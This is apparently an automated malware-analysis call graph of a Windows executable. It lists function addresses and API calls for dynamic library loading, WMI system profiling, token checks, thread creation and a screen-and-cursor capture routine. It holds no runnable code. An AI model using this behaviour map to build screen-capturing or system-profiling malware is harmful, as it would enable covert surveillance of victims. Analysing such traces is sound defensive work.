14382->14381 14383 73f689 GetLastError 14383->14377 14384 73f695 14383->14384 14386 73a1f8 GetSystemTimeAsFileTime 14384->14386 14385 73a1f8 GetSystemTimeAsFileTime 14387 73f5ec 14385->14387 14386->14377 14387->14377 14387->14379 14387->14383 14387->14385 14388 738e5d 3 API calls 14387->14388 14388->14387 14391 73f70b 14389->14391 14390 73f730 GetLastError 14392 73f72b 14390->14392 14391->14390 14391->14392 14392->14371 14393->14376 14394->14387 14396 741d74 14395->14396 14397 741d2e 14395->14397 14396->14207 14397->14396 14400 74246c 14397->14400 14399 741d61 14399->14207 14407 741e6f 14400->14407 14402 742483 14405 7424aa 14402->14405 14411 7425e0 14402->14411 14404 7424a1 14404->14405 14406 741e6f 8 API calls 14404->14406 14405->14399 14406->14405 14408 741e81 14407->14408 14410 741eba 14408->14410 14421 74200e 14408->14421 14410->14402 14412 742641 14411->14412 14413 7425f7 14411->14413 14412->14404 14413->14412 14414 742667 14413->14414 14415 742613 14413->14415 14447 7423ec 14414->14447 14417 742656 14415->14417 14418 742618 14415->14418 14437 7424dd 14417->14437 14418->14412 14420 742629 memchr 14418->14420 14420->14412 14422 742028 14421->14422 14423 7420e2 14422->14423 14424 74204d 14422->14424 14425 742097 14422->14425 14423->14424 14428 74349a 14423->14428 14424->14410 14427 7420a7 _errno _strtoi64 _errno 14425->14427 14427->14424 14434 7434fe localeconv 14428->14434 14431 7434e1 _errno 14433 7434ed 14431->14433 14432 7434d2 14432->14431 14432->14433 14433->14424 14435 7434a9 _errno strtod 14434->14435 14436 74350e strchr 14434->14436 14435->14431 14435->14432 14436->14435 14438 7411b3 7 API calls 14437->14438 14439 7424e9 14438->14439 14440 741e6f 8 API calls 14439->14440 14442 74250b 14439->14442 14445 7424ff 14440->14445 14441 742528 memchr 14441->14442 14441->14445 14442->14412 14443 741e6f 8 API calls 14443->14445 14444 7425e0 17 API calls 14444->14445 14445->14441 14445->14442 14445->14443 14445->14444 14446 7412d9 strncpy 14445->14446 14446->14445 14448 7423f5 14447->14448 14449 742410 14448->14449 14450 741e6f 8 API calls 14448->14450 14449->14412 14452 742408 14450->14452 14451 7425e0 18 API calls 14451->14452 14452->14449 14452->14451 14453 741e6f 8 API calls 14452->14453 14453->14452 14455 740542 GetTickCount 14454->14455 14456 740531 __aulldiv 14454->14456 14455->14139 14456->14139 14458 7411b3 7 API calls 14457->14458 14459 73884a 14458->14459 14460 738927 strncpy 14459->14460 14461 738860 14460->14461 14462 738927 strncpy 14461->14462 14463 738874 14462->14463 14464 738927 strncpy 14463->14464 14465 738885 14464->14465 14466 738927 strncpy 14465->14466 14467 738896 14466->14467 14468 738927 strncpy 14467->14468 14469 7388ab 14468->14469 14470 738927 strncpy 14469->14470 14471 7388c0 14470->14471 14472 738927 strncpy 14471->14472 14473 7388d6 14472->14473 14474 741c34 13 API calls 14473->14474 14475 7388de 14474->14475 14475->14144 14504 7357a0 14509 73e565 14504->14509 14507 7357b5 GetLastError 14508 7357be 14507->14508 14534 738dc9 RtlAllocateHeap 14509->14534 14511 73e57c 14512 739ab3 RtlAllocateHeap 14511->14512 14531 7357b1 14511->14531 14513 73e591 14512->14513 14513->14531 14535 73a5fe 14513->14535 14516 739f85 2 API calls 14517 73e5af 14516->14517 14518 739fe4 2 API calls 14517->14518 14519 73e5c4 14518->14519 14520 738d9a 2 API calls 14519->14520 14521 73e5cd 14520->14521 14543 73e3b5 14521->14543 14523 73e5d7 14524 73e5de 14523->14524 14550 73e3f9 14523->14550 14526 738ddf 2 API calls 14524->14526 14527 73e6b1 14526->14527 14528 738ddf 2 API calls 14527->14528 14529 73e6bc 14528->14529 14530 738ddf 2 API calls 14529->14530 14530->14531 14531->14507 14531->14508 14532 73e5ed 14532->14524 14533 73e684 lstrlenW 14532->14533 14533->14532 14534->14511 14538 73a617 14535->14538 14536 73a717 14536->14516 14537 73a692 14541 738ecb lstrlenW 14537->14541 14542 73a6ef 14537->14542 14538->14536 14538->14537 14539 738e5d 3 API calls 14538->14539 14539->14537 14540 738f63 memset 14540->14536 14541->14537 14542->14536 14542->14540 14544 739f85 2 API calls 14543->14544 14545 73e3c7 14544->14545 14546 739eab 4 API calls 14545->14546 14547 73e3d1 14546->14547 14548 738d9a 2 API calls 14547->14548 14549 73e3dc 14548->14549 14549->14523 14551 739c50 2 API calls 14550->14551 14552 73e412 CoInitializeEx 14551->14552 14553 739f85 2 API calls 14552->14553 14554 73e42d 14553->14554 14555 739f85 2 API calls 14554->14555 14556 73e43e 14555->14556 14557 738d9a 2 API calls 14556->14557 14558 73e45a 14557->14558 14559 738d9a 2 API calls 14558->14559 14560 73e470 14559->14560 14561 738ddf 2 API calls 14560->14561 14562 73e47b 14561->14562 14562->14532 14653 731295 14654 73aab0 4 API calls 14653->14654 14655 7312ac 14654->14655 14656 7312d1 14655->14656 14657 7436d5 2 API calls 14655->14657 14658 73117d 5 API calls 14656->14658 14657->14656 14659 7312fa 14658->14659 14660 731306 14659->14660 14661 73ab83 4 API calls 14659->14661 14662 731316 14661->14662 14664 737c67 50 API calls 14662->14664 14690 7313d4 14662->14690 14663 73b305 4 API calls 14665 7313eb 14663->14665 14666 731334 14664->14666 14667 73b3f2 5 API calls 14665->14667 14668 73133d 14666->14668 14669 731371 14666->14669 14671 73ab83 4 API calls 14666->14671 14670 7313f7 14667->14670 14677 738ddf 2 API calls 14668->14677 14673 73b305 4 API calls 14669->14673 14859 737aa7 14670->14859 14674 731368 14671->14674 14676 73138d 14673->14676 14674->14669 14691 736991 14674->14691 14680 73b3f2 5 API calls 14676->14680 14677->14660 14678 73143e 14678->14668 14686 73110a 8 API calls 14678->14686 14679 73142c 14682 73110a 8 API calls 14679->14682 14683 731399 14680->14683 14684 731438 14682->14684 14842 737d0f 14683->14842 14888 7310ba 14684->14888 14686->14684 14690->14663 14896 738dc9 RtlAllocateHeap 14691->14896 14693 7369a7 14694 73aaff 4 API calls 14693->14694 14794 736ea0 14693->14794 14695 7369bc 14694->14695 14897 73fd3d 14695->14897 14700 739ab3 RtlAllocateHeap 14701 7369e0 14700->14701 14702 739ab3 RtlAllocateHeap 14701->14702 14703 7369f4 14702->14703 14704 736a19 14703->14704 14705 739ab3 RtlAllocateHeap 14703->14705 14706 739ab3 RtlAllocateHeap 14704->14706 14705->14704 14707 736a3e 14706->14707 14923 73e849 14707->14923 14713 736aac 14714 736ab3 14713->14714 14970 738dc9 RtlAllocateHeap 14713->14970 14717 73109a 2 API calls 14714->14717 14716 736ac1 14716->14714 14719 73bb95 memset 14716->14719 14718 736b02 14717->14718 14971 73b83a 14718->14971 14719->14714 14722 738d9a 2 API calls 14723 736b1c 14722->14723 14724 73109a 2 API calls 14723->14724 14725 736b28 14724->14725 14726 73b83a 5 API calls 14725->14726 14727 736b33 14726->14727 14728 738d9a 2 API calls 14727->14728 14729 736b42 14728->14729 14730 73109a 2 API calls 14729->14730 14731 736b4a 14730->14731 14732 73b83a 5 API calls 14731->14732 14733 736b55 14732->14733 14734 738d9a 2 API calls 14733->14734 14735 736b64 14734->14735 14736 73109a 2 API calls 14735->14736 14737 736b70 14736->14737 14738 73b83a 5 API calls 14737->14738 14739 736b7b 14738->14739 14740 738d9a 2 API calls 14739->14740 14741 736b8a 14740->14741 14742 736bdc 14741->14742 14743 73109a 2 API calls 14741->14743 14744 73109a 2 API calls 14742->14744 14745 736ba3 14743->14745 14746 736bec 14744->14746 14747 739fe4 2 API calls 14745->14747 14748 73b83a 5 API calls 14746->14748 14749 736bc5 14747->14749 14750 736bf7 14748->14750 14751 738d9a 2 API calls 14749->14751 14752 738d9a 2 API calls 14750->14752 14753 736bce 14751->14753 14754 736c06 14752->14754 14756 73b83a 5 API calls 14753->14756 14755 73109a 2 API calls 14754->14755 14757 736c12 14755->14757 14756->14742 14758 73b83a 5 API calls 14757->14758 14759 736c1d 14758->14759 14760 738d9a 2 API calls 14759->14760 14761 736c2c 14760->14761 14762 73109a 2 API calls 14761->14762 14763 736c34 14762->14763 14764 73b83a 5 API calls 14763->14764 14765 736c3f 14764->14765 14766 738d9a 2 API calls 14765->14766 14767 736c4e 14766->14767 14768 73109a 2 API calls 14767->14768 14769 736c5a 14768->14769 14770 73b83a 5 API calls 14769->14770 14771 736c65 14770->14771 14772 738d9a 2 API calls 14771->14772 14773 736c74 14772->14773 14774 73109a 2 API calls 14773->14774 14775 736c80 14774->14775 14776 73b83a 5 API calls 14775->14776 14777 736c8b 14776->14777 14778 738d9a 2 API calls 14777->14778 14779 736c9a 14778->14779 14780 73109a 2 API calls 14779->14780 14781 736ca6 14780->14781 14782 73b83a 5 API calls 14781->14782 14783 736cb1 14782->14783 14784 738d9a 2 API calls 14783->14784 14785 736cc0 14784->14785 14786 73109a 2 API calls 14785->14786 14787 736ccc 14786->14787 14788 73b83a 5 API calls 14787->14788 14789 736cd7 14788->14789 14790 738d9a 2 API calls 14789->14790 14791 736ce6 14790->14791 14989 738dc9 RtlAllocateHeap 14791->14989 14793 736d0e 14793->14794 14795 739f85 2 API calls 14793->14795 14794->14669 14796 736d27 14795->14796 14797 739f85 2 API calls 14796->14797 14798 736d32 14797->14798 14799 739f85 2 API calls 14798->14799 14800 736d43 14799->14800 14801 739f85 2 API calls 14800->14801 14802 736d52 14801->14802 14803 739f85 2 API calls 14802->14803 14804 736d61 14803->14804 14805 739f85 2 API calls 14804->14805 14843 740522 GetTickCount 14842->14843 14844 737d2f 14843->14844 15074 738146 14844->15074 15245 739905 14859->15245 14862 740522 GetTickCount 14863 737aee 14862->14863 15251 737f12 14863->15251 14865 731420 14865->14678 14865->14679 14866 737b0e 14866->14865 14867 7376f8 19 API calls 14866->14867 14868 737b3e 14867->14868 14872 737692 8 API calls 14868->14872 14887 737b45 14868->14887 14869 738ddf 2 API calls 14870 737c47 14869->14870 14871 738ddf 2 API calls 14870->14871 14873 737c52 14871->14873 14874 737b6f 14872->14874 14875 738ddf 2 API calls 14873->14875 14874->14887 15290 73793f 14874->15290 14875->14865 14877 737b9a 14877->14887 15303 73780f 14877->15303 14880 73110a 8 API calls 14881 737bda 14880->14881 14882 737be6 14881->14882 14883 738f63 memset 14881->14883 15317 7377be 14882->15317 14884 737bfb 14883->14884 14885 731d97 6 API calls 14884->14885 14885->14882 14887->14869 14889 7310c6 14888->14889 14890 7310da 14888->14890 14891 73aaff 4 API calls 14889->14891 14892 73aaff 4 API calls 14890->14892 14893 7310cd 14891->14893 14892->14893 14894 739fa5 2 API calls 14893->14894 14895 7310fd 14894->14895 14895->14668 14896->14693 14898 739fa5 2 API calls 14897->14898 14899 7369c7 14898->14899 14900 73e795 14899->14900 14901 739f85 2 API calls 14900->14901 14902 73e7aa 14901->14902 15045 73e485 CoInitializeEx CoInitializeSecurity CoCreateInstance 14902->15045 14905 738d9a 2 API calls 14906 73e7c2 14905->14906 14907 7369cc 14906->14907 14908 739f85 2 API calls 14906->14908 14907->14700 14909 73e7d6 14908->14909 14910 739f85 2 API calls 14909->14910 14911 73e7e7 14910->14911 15052 73e6d9 SysAllocString SysAllocString 14911->15052 14913 73e7f8 14914 73e826 14913->14914 14915 739ab3 RtlAllocateHeap 14913->14915 14916 738d9a 2 API calls 14914->14916 14917 73e807 VariantClear 14915->14917 14918 73e82f 14916->14918 14917->14914 14920 738d9a 2 API calls 14918->14920 14921 73e838 14920->14921 15058 73e539 14921->15058 14924 739f85 2 API calls 14923->14924 14925 73e85b 14924->14925 14926 73e485 6 API calls 14925->14926 14927 73e865 14926->14927 14928 738d9a 2 API calls 14927->14928 14929 73e873 14928->14929 14930 739f85 2 API calls 14929->14930 14945 736a80 14929->14945 14931 73e887 14930->14931 14932 739f85 2 API calls 14931->14932 14933 73e898 14932->14933 14934 73e6d9 10 API calls 14933->14934 14935 73e8a9 14934->14935 14936 73e8d7 14935->14936 14937 739ab3 RtlAllocateHeap 14935->14937 14938 738d9a 2 API calls 14936->14938 14940 73e8b8 VariantClear 14937->14940 14939 73e8e0 14938->14939 14942 738d9a 2 API calls 14939->14942 14940->14936 14943 73e8e9 14942->14943 14944 73e539 2 API calls 14943->14944 14944->14945 14946 73e8fa 14945->14946 14947 739f85 2 API calls 14946->14947 14948 73e90f 14947->14948 14949 73e485 6 API calls 14948->14949 14950 73e919 14949->14950 14951 738d9a 2 API calls 14950->14951 14952 73e927 14951->14952 14953 739f85 2 API calls 14952->14953 14968 736a88 14952->14968 14954 73e93b 14953->14954 14955 739f85 2 API calls 14954->14955 14956 73e94c 14955->14956 14957 73e6d9 10 API calls 14956->14957 14958 73e95d 14957->14958 14959 73e98b 14958->14959 14960 739ab3 RtlAllocateHeap 14958->14960 14961 738d9a 2 API calls 14959->14961 14964 73e96c VariantClear 14960->14964 14962 73e994 14961->14962 14963 738d9a 2 API calls 14962->14963 14966 73e99d 14963->14966 14964->14959 14967 73e539 2 API calls 14966->14967 14967->14968 14969 738dc9 RtlAllocateHeap 14968->14969 14969->14713 14970->14716 14972 738f63 memset 14971->14972 14973 73b87e 14972->14973 14974 738f63 memset 14973->14974 14975 73b88a 14974->14975 14983 73b9e2 14975->14983 14988 736b0d 14975->14988 15063 738dc9 RtlAllocateHeap 14975->15063 14976 738ddf 2 API calls 14976->14988 14978 739a76 RtlAllocateHeap 14980 73b8f9 14978->14980 14979 739bfd 2 API calls 14979->14980 14980->14978 14980->14979 14981 738ddf 2 API calls 14980->14981 14982 73b9a8 14980->14982 14980->14983 14980->14988 14981->14980 14982->14983 14984 739b26 2 API calls 14982->14984 14983->14976 14985 73b9cb 14984->14985 14985->14983 14986 73b9d1 14985->14986 14987 738ddf 2 API calls 14986->14987 14987->14988 14988->14722 14989->14793 15046 73e4ca SysAllocString 15045->15046 15051 73e507 15045->15051 15047 73e4e5 15046->15047 15048 73e4e9 CoSetProxyBlanket 15047->15048 15047->15051 15049 73e500 15048->15049 15048->15051 15062 738dc9 RtlAllocateHeap 15049->15062 15051->14905 15053 739f85 2 API calls 15052->15053 15054 73e704 SysAllocString 15053->15054 15055 738d9a 2 API calls 15054->15055 15057 73e717 SysFreeString SysFreeString SysFreeString 15055->15057 15057->14913 15059 73e544 15058->15059 15060 738ddf 2 API calls 15059->15060 15061 73e561 15060->15061 15061->14907 15062->15051 15063->14980 15075 7411b3 7 API calls 15074->15075 15076 738156 15075->15076 15077 738927 strncpy 15076->15077 15078 73816f 15077->15078 15079 738927 strncpy 15078->15079 15080 738183 15079->15080 15081 738927 strncpy 15080->15081 15082 738194 15081->15082 15083 738927 strncpy 15082->15083 15084 7381a7 15083->15084 15085 738927 strncpy 15084->15085 15086 7381bd 15085->15086 15087 738927 strncpy 15086->15087 15088 7381d1 15087->15088 15089 738927 strncpy 15088->15089 15090 7381ea 15089->15090 15091 738927 strncpy 15090->15091 15092 7381fe 15091->15092 15093 738927 strncpy 15092->15093 15094 738212 15093->15094 15095 738927 strncpy 15094->15095 15096 738226 15095->15096 15097 738927 strncpy 15096->15097 15098 73823c 15097->15098 15099 738927 strncpy 15098->15099 15100 738253 15099->15100 15230 738983 15100->15230 15103 738927 strncpy 15104 738266 15103->15104 15105 738927 strncpy 15104->15105 15106 73827a 15105->15106 15107 738927 strncpy 15106->15107 15108 73828e 15107->15108 15109 738983 5 API calls 15108->15109 15110 738296 15109->15110 15111 738927 strncpy 15110->15111 15112 7382a1 15111->15112 15113 738983 5 API calls 15112->15113 15114 7382a9 15113->15114 15115 738927 strncpy 15114->15115 15116 7382b4 15115->15116 15117 738983 5 API calls 15116->15117 15118 7382bc 15117->15118 15119 738927 strncpy 15118->15119 15120 7382c7 15119->15120 15121 738927 strncpy 15120->15121 15122 7382db 15121->15122 15123 738983 5 API calls 15122->15123 15124 7382e3 15123->15124 15125 738927 strncpy 15124->15125 15126 7382ee 15125->15126 15127 738927 strncpy 15126->15127 15128 738308 15127->15128 15129 738983 5 API calls 15128->15129 15130 738310 15129->15130 15131 738927 strncpy 15130->15131 15132 73831b 15131->15132 15133 738927 strncpy 15132->15133 15134 73832f 15133->15134 15135 738927 strncpy 15134->15135 15136 738343 15135->15136 15137 738983 5 API calls 15136->15137 15138 738357 15137->15138 15139 738927 strncpy 15138->15139 15140 738362 15139->15140 15141 738927 strncpy 15140->15141 15142 738376 15141->15142 15143 738927 strncpy 15142->15143 15144 73838a 15143->15144 15145 738983 5 API calls 15144->15145 15146 738395 15145->15146 15147 738927 strncpy 15146->15147 15148 7383a0 15147->15148 15149 738983 5 API calls 15148->15149 15150 7383ab 15149->15150 15151 738927 strncpy 15150->15151 15152 7383b6 15151->15152 15153 738983 5 API calls 15152->15153 15154 7383c1 15153->15154 15155 738927 strncpy 15154->15155 15156 7383cc 15155->15156 15157 738983 5 API calls 15156->15157 15158 7383d7 15157->15158 15159 738927 strncpy 15158->15159 15160 7383e2 15159->15160 15161 738983 5 API calls 15160->15161 15162 7383ed 15161->15162 15163 738927 strncpy 15162->15163 15164 7383f8 15163->15164 15165 738983 5 API calls 15164->15165 15166 738403 15165->15166 15167 738927 strncpy 15166->15167 15168 73840e 15167->15168 15169 738983 5 API calls 15168->15169 15170 738419 15169->15170 15171 738927 strncpy 15170->15171 15172 738424 15171->15172 15173 738983 5 API calls 15172->15173 15174 73842f 15173->15174 15175 738927 strncpy 15174->15175 15176 73843a 15175->15176 15177 738983 5 API calls 15176->15177 15178 738445 15177->15178 15179 738927 strncpy 15178->15179 15180 738450 15179->15180 15181 738983 5 API calls 15180->15181 15182 73845e 15181->15182 15183 738927 strncpy 15182->15183 15184 738469 15183->15184 15185 738983 5 API calls 15184->15185 15186 738474 15185->15186 15187 738927 strncpy 15186->15187 15188 73847f 15187->15188 15189 738983 5 API calls 15188->15189 15190 73848a 15189->15190 15235 739b62 15230->15235 15232 738996 15233 738ddf 2 API calls 15232->15233 15234 73825b 15232->15234 15233->15234 15234->15103 15236 739b71 WideCharToMultiByte 15235->15236 15243 739bc1 15235->15243 15237 739b8c 15236->15237 15236->15243 15244 738dc9 RtlAllocateHeap 15237->15244 15239 739b95 15240 739b9d WideCharToMultiByte 15239->15240 15239->15243 15241 739bb6 15240->15241 15240->15243 15242 738ddf 2 API calls 15241->15242 15242->15243 15243->15232 15244->15239 15246 739913 15245->15246 15247 7436d5 2 API calls 15246->15247 15248 73995d 15247->15248 15249 737ae9 15248->15249 15250 7436d5 2 API calls 15248->15250 15249->14862 15250->15248 15252 7411b3 7 API calls 15251->15252 15253 737f21 15252->15253 15254 738927 strncpy 15253->15254 15255 737f37 15254->15255 15256 738927 strncpy 15255->15256 15257 737f4c 15256->15257 15258 738927 strncpy 15257->15258 15259 737f60 15258->15259 15260 738927 strncpy 15259->15260 15261 737f75 15260->15261 15262 738927 strncpy 15261->15262 15263 737f86 15262->15263 15264 738927 strncpy 15263->15264 15265 737f9f 15264->15265 15266 738927 strncpy 15265->15266 15267 737fb5 15266->15267 15268 738927 strncpy 15267->15268 15269 737fc6 15268->15269 15270 738927 strncpy 15269->15270 15271 737fda 15270->15271 15272 738927 strncpy 15271->15272 15273 737fed 15272->15273 15274 738927 strncpy 15273->15274 15275 738001 15274->15275 15276 738927 strncpy 15275->15276 15277 738020 15276->15277 15278 738983 5 API calls 15277->15278 15279 738031 15278->15279 15280 738927 strncpy 15279->15280 15281 73803c 15280->15281 15282 738983 5 API calls 15281->15282 15283 73804d 15282->15283 15284 738927 strncpy 15283->15284 15285 738058 15284->15285 15286 738927 strncpy 15285->15286 15287 738074 15286->15287 15288 741c34 13 API calls 15287->15288 15289 73807c 15288->15289 15289->14866 15291 741d21 18 API calls 15290->15291 15292 73795d 15291->15292 15293 73a06e memset 15292->15293 15296 737969 15292->15296 15294 73799d 15293->15294 15294->15296 15324 738dc9 RtlAllocateHeap 15294->15324 15296->14877 15297 737a75 15299 738ddf 2 API calls 15297->15299 15301 737a86 15297->15301 15298 737a21 15298->15296 15298->15297 15300 739a76 RtlAllocateHeap 15298->15300 15299->15297 15300->15298 15302 738ddf 2 API calls 15301->15302 15302->15296 15304 737826 15303->15304 15305 7378b6 15304->15305 15306 73bfc8 2 API calls 15304->15306 15305->14880 15305->14887 15307 737842 15306->15307 15307->15305 15308 73788e 15307->15308 15325 738dc9 RtlAllocateHeap 15307->15325 15310 738ddf 2 API calls 15308->15310 15312 7378ac 15310->15312 15311 73785f 15311->15308 15314 739fa5 2 API calls 15311->15314 15313 738ddf 2 API calls 15312->15313 15313->15305 15315 73787e 15314->15315 15326 738bbb 15315->15326 15342 73808f 15317->15342 15319 7377db 15320 7376f8 19 API calls 15319->15320 15321 7377fb 15320->15321 15322 738ddf 2 API calls 15321->15322 15323 737806 15322->15323 15323->14887 15324->15298 15325->15311 15329 738a4f 15326->15329 15336 7389b9 15329->15336 15331 738a7c 15331->15308 15332 738aa8 GetLastError 15335 738b37 15332->15335 15333 738ddf 2 API calls 15333->15331 15335->15333 15341 738dc9 RtlAllocateHeap 15336->15341 15338 738a2c 15338->15331 15338->15332 15338->15335 15339 7389ca 15339->15338 15340 738a1b lstrlenW 15339->15340 15340->15338 15341->15339 15343 7411b3 7 API calls 15342->15343 15344 73809e 15343->15344 15345 738927 strncpy 15344->15345 15346 7380b4 15345->15346 15347 738927 strncpy 15346->15347 15348 7380c8 15347->15348 15349 738927 strncpy 15348->15349 15350 7380d9 15349->15350 15351 738927 strncpy 15350->15351 15352 7380ea 15351->15352 15353 738927 strncpy 15352->15353 15354 7380ff 15353->15354 15355 738927 strncpy 15354->15355 15356 738115 15355->15356 15357 738927 strncpy 15356->15357 15358 73812b 15357->15358 15359 741c34 13 API calls 15358->15359 15360 738133 15359->15360 15360->15319 15361 735f94 15367 738dc9 RtlAllocateHeap 15361->15367 15363 736012 15365 73a1f8 GetSystemTimeAsFileTime 15366 735fa9 15365->15366 15366->15363 15366->15365 15368 735d1e GetDC 15366->15368 15367->15366 15369 735f3e 15368->15369 15370 735d50 CreateCompatibleDC 15368->15370 15372 738ddf 2 API calls 15369->15372 15370->15369 15371 735d61 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 15370->15371 15371->15369 15373 735d8c SelectObject 15371->15373 15374 735f5d 15372->15374 15373->15369 15375 735d9f BitBlt GetCursorInfo 15373->15375 15376 738ddf 2 API calls 15374->15376 15377 735dd0 15375->15377 15378 735e25 SelectObject 15375->15378 15379 735f68 15376->15379 15377->15378 15380 735dd5 CopyIcon GetIconInfo GetObjectW DrawIconEx 15377->15380 15378->15369 15381 735e39 GetObjectW 15378->15381 15382 735f76 15379->15382 15383 735f6f DeleteDC 15379->15383 15380->15378 15394 738dc9 RtlAllocateHeap 15381->15394 15384 735f81 15382->15384 15385 735f7a DeleteDC 15382->15385 15383->15382 15387 735f85 DeleteObject 15384->15387 15388 735f8c 15384->15388 15385->15384 15387->15388 15388->15366 15389 735ea2 15389->15369 15390 735eae GetDIBits 15389->15390 15395 738dc9 RtlAllocateHeap 15390->15395 15392 735ed4 15392->15369 15393 73fbfb 18 API calls 15392->15393 15393->15369 15394->15389 15395->15392 11195 736603 11196 736611 11195->11196 11198 736669 11195->11198 11224 738db4 HeapCreate 11196->11224 11199 736616 11225 739787 11199->11225 11208 736664 11210 738d9a 2 API calls 11208->11210 11209 73666e 11245 738d9a 11209->11245 11210->11198 11217 7366c5 CreateThread 11217->11198 11325 7363a2 11217->11325 11218 73f0d9 8 API calls 11219 7366a0 11218->11219 11258 73647a memset 11219->11258 11224->11199 11277 738dc9 RtlAllocateHeap 11225->11277 11227 73661b 11228 743d36 11227->11228 11229 743d6b 11228->11229 11278 738e2e 11229->11278 11231 736629 11232 73f0d9 11231->11232 11282 739f6b 11232->11282 11235 73f103 LoadLibraryA 11237 73f10a 11235->11237 11236 73f0fb GetModuleHandleA 11236->11237 11240 73f118 11237->11240 11285 73f08e 11237->11285 11290 738d87 11240->11290 11242 739f85 11308 738ca3 11242->11308 11244 736650 GetFileAttributesW 11244->11208 11244->11209 11246 736673 11245->11246 11247 738da8 11245->11247 11249 73109a 11246->11249 11248 738ddf 2 API calls 11247->11248 11248->11246 11250 738ca3 2 API calls 11249->11250 11251 7310b5 11250->11251 11252 73fcda 11251->11252 11253 73fcf6 11252->11253 11254 736687 11253->11254 11314 738dc9 RtlAllocateHeap 11253->11314 11254->11217 11254->11218 11256 73fd09 11256->11254 11257 738ddf 2 API calls 11256->11257 11257->11254 11315 731080 11258->11315 11260 7364a6 11261 7364b7 11260->11261 11262 7364f8 11260->11262 11263 731080 2 API calls 11261->11263 11264 731080 2 API calls 11262->11264 11265 7364c1 11263->11265 11266 736502 11264->11266 11318 739fa5 11265->11318 11269 738d87 2 API calls 11266->11269 11268 7364d7 11270 738d87 2 API calls 11268->11270 11271 7364e2 11269->11271 11270->11271 11272 738ddf 11271->11272 11273 7366b5 11272->11273 11274 738de9 11272->11274 11273->11217 11274->11273 11275 738f63 memset 11274->11275 11276 738e19 HeapFree 11275->11276 11276->11273 11277->11227 11281 738dc9 RtlAllocateHeap 11278->11281 11280 738e3f 11280->11231 11281->11280 11294 738bcd 11282->11294 11301 738dc9 RtlAllocateHeap 11285->11301 11287 73f0a0 11289 73f0cf 11287->11289 11302 73ef38 11287->11302 11289->11240 11291 73663f 11290->11291 11292 738d8f 11290->11292 11291->11242 11293 738ddf 2 API calls 11292->11293 11293->11291 11295 738be4 11294->11295 11299 738c05 11294->11299 11295->11299 11300 738dc9 RtlAllocateHeap 11295->11300 11296 738c4c lstrlenW 11298 738c58 11296->11298 11298->11235 11298->11236 11299->11296 11299->11298 11300->11299 11301->11287 11303 73efac 11302->11303 11304 73ef51 11302->11304 11303->11287 11304->11303 11305 73f004 LoadLibraryA 11304->11305 11305->11303 11306 73f012 GetProcAddress 11305->11306 11306->11303 11307 73f01e 11306->11307 11307->11303 11310 738cc4 11308->11310 11309 738d31 lstrlenW 11313 738dc9 RtlAllocateHeap 11309->11313 11310->11309 11310->11310 11312 738d4b 11312->11244 11312->11312 11313->11312 11314->11256 11316 738bcd 2 API calls 11315->11316 11317 731096 11316->11317 11317->11260 11322 738f63 11318->11322 11321 739fd3 11321->11268 11323 738f7d _vsnprintf 11322->11323 11324 738f6c memset 11322->11324 11323->11321 11324->11323 11337 73651e 11325->11337 11329 7363b3 11331 7363ed 11329->11331 11336 7363bd 11329->11336 11400 73d889 11329->11400 11332 736424 11331->11332 11333 73641d 11331->11333 11332->11336 11440 733597 11332->11440 11416 7361e8 11333->11416 11338 73f0d9 8 API calls 11337->11338 11339 736532 11338->11339 11340 73f0d9 8 API calls 11339->11340 11341 73654b 11340->11341 11342 73f0d9 8 API calls 11341->11342 11343 736564 11342->11343 11344 73f0d9 8 API calls 11343->11344 11345 73657d 11344->11345 11346 73f0d9 8 API calls 11345->11346 11347 736598 11346->11347 11348 73f0d9 8 API calls 11347->11348 11349 7365b1 11348->11349 11350 73f0d9 8 API calls 11349->11350 11351 7365ca 11350->11351 11352 73f0d9 8 API calls 11351->11352 11353 7365e3 11352->11353 11354 73f0d9 8 API calls 11353->11354 11355 7363a7 GetOEMCP 11354->11355 11356 73dfc2 11355->11356 11447 738dc9 RtlAllocateHeap 11356->11447 11358 73dfdd 11359 73dfe8 GetCurrentProcessId 11358->11359 11399 73e33d 11358->11399 11360 73e000 11359->11360 11448 73ca0a 11360->11448 11362 73e053 11363 73e064 11362->11363 11455 73ca5a 11362->11455 11464 73f3a0 11363->11464 11368 73e099 11369 73e0e3 GetLastError 11368->11369 11370 73e0e9 GetSystemMetrics 11368->11370 11369->11370 11371 73e110 11370->11371 11473 73c85a 11371->11473 11377 73e14b 11490 73c870 11377->11490 11382 738f63 memset 11383 73e1a2 GetVersionExA 11382->11383 11509 73ddbe 11383->11509 11387 73e1c0 GetWindowsDirectoryW 11388 739f85 2 API calls 11387->11388 11389 73e1e3 11388->11389 11390 738d9a 2 API calls 11389->11390 11391 73e21d 11390->11391 11393 73e255 11391->11393 11532 739fe4 11391->11532 11515 74357b 11393->11515 11399->11329 11610 73d7cd 11400->11610 11403 73d9d5 11403->11331 11405 73d9ca 11407 738ddf 2 API calls 11405->11407 11406 73d9b8 11406->11405 11408 738ddf 2 API calls 11406->11408 11407->11403 11408->11406 11409 738f63 memset 11415 73d8c6 11409->11415 11412 73d939 GetLastError 11640 73dadc ResumeThread 11412->11640 11414 73d963 FindCloseChangeNotification 11414->11415 11415->11405 11415->11406 11415->11409 11415->11412 11415->11414 11622 73be10 11415->11622 11627 73d9de 11415->11627 11710 73a79b 11416->11710 11419 7361f7 11419->11336 11420 73620f 11726 73601d 11420->11726 11426 736223 11428 736277 11426->11428 11429 736228 11426->11429 11427 736272 11761 7360d9 11427->11761 11431 736293 11428->11431 11432 736270 11428->11432 11774 740ac8 11428->11774 11429->11431 11435 73b6e3 7 API calls 11429->11435 11431->11336 11795 7360bf 11432->11795 11436 736248 11435->11436 11738 735c8c 11436->11738 12958 738dc9 RtlAllocateHeap 11440->12958 11442 73359e 11443 7335d5 11442->11443 12959 738dc9 RtlAllocateHeap 11442->12959 11443->11336 11445 7335af 11445->11443 11446 7398d0 2 API calls 11445->11446 11446->11443 11447->11358 11449 73ca21 11448->11449 11450 73ca25 11449->11450 11536 73c9f3 11449->11536 11450->11362 11453 73ca36 11453->11362 11454 73ca4a FindCloseChangeNotification 11454->11453 11549 73c92f GetCurrentThread OpenThreadToken 11455->11549 11458 73c986 6 API calls 11463 73ca8e FindCloseChangeNotification 11458->11463 11460 73cb10 11460->11363 11461 73cb06 11462 738ddf 2 API calls 11461->11462 11462->11460 11463->11460 11463->11461 11466 73f3bf 11464->11466 11465 73e08e 11468 73f365 11465->11468 11466->11465 11554 739ab3 11466->11554 11469 73f37c 11468->11469 11470 73f39c 11469->11470 11471 739ab3 RtlAllocateHeap 11469->11471 11470->11368 11472 73f389 11471->11472 11472->11368 11559 73c778 11473->11559 11475 73c86e 